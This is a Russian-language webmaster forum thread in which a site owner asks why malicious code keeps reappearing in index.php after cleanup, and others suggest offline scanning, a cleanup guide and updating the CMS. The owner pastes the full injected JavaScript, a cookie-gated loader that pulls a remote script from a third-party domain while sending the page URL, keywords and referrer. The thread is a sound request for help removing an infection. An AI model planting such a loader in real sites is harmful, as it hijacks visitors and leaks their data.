Вирусы...

Автор Rr-r, 10-12-2016, 01:28:17

« назад - далее »

Rr-rTopic starter

Добрый вечер. Помогите разобраться... Айболит понаходил кучу файлов, на хостинге они уже были с расширением .suspected.
После того, как почистил все .suspected и внутренности заражённых файлов .php (пример скрипта см. ниже), всё равно в трёх файлах index.php появляется вредоносный код.
  •  


tartaren

Была ситуация с вирусами на сайтах. На одном из "лучших " хостингов были заражены несколько, в том числе не опубликованные. На том хостинге нет изолирования папок. Айболит нашёл СТОПИЦОТ подозрительных файлов и всё на том, вручную искать - это очень долго.
Помогло скачивание файлов (архива сайта) и антивирус компьютера быстренько нашёл вирусы в скачанном и удалил. После загрузки на хостниг (другой конечно) - бегет в частности, сайты работали и вроде без проблем с вирусами. Правда в скором времени на всех почти было произведено обновление движка и функционала. Но во всяком случае после чистки офлайн поисковики не показывали наличие вредоносного кода.


Rr-rTopic starter

Ругается на скрипт и вижу такую строку:
src="http://www.akustikyd.com /js/jquery.min.php?key=b64&utm_campaign=I92930
где вместо http://www.akustikyd.com часто вижу другие сайты, типа Мебель и прочее
Откуда он берётся? Пробую пройтись по всем файлам на хостинге, потому что вижу кое-где файлы, созданные недавно, с расширением .php и на которые Айболит не ругается... Но это очень утомительно...
Пример скрипта в файле index.php:
<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://www.akustikyd.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'I92930' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';varmetas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas
  • .name.toLowerCase() == "keywords") {keywords += metas
  • .content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
       
    Я не силён в скриптах, но понимаю по обрывкам фраз, что это что-то связано с файлами куки.
    Главные вопросы:
    1.   Найти, каким образом вирус заново прописывается?
    2.   Как это противостоять?
  •  

Coder

Цитата: Rr-r от 10-12-2016, 11:19:14Главные вопросы:
Посмотрите:

Удалить вирус с сайта самостоятельно _http://coderhs.com/archive/delete_virus

Пользовался и пользуюсь сам - потому, не от "балды".



Rr-rTopic starter

Цитата: Coder от 10-12-2016, 12:09:26
Посмотрите:

Удалить вирус с сайта самостоятельно _http://coderhs.com/archive/delete_virus

Пользовался и пользуюсь сам - потому, не от "балды".
Попробую... интересный материал
  •  


ProtectYourSite

Смотрю обновить сайт не додумались, а потом спрашиваете откуда вирусы берутся.
И как минимум для защиты сайтов на джумле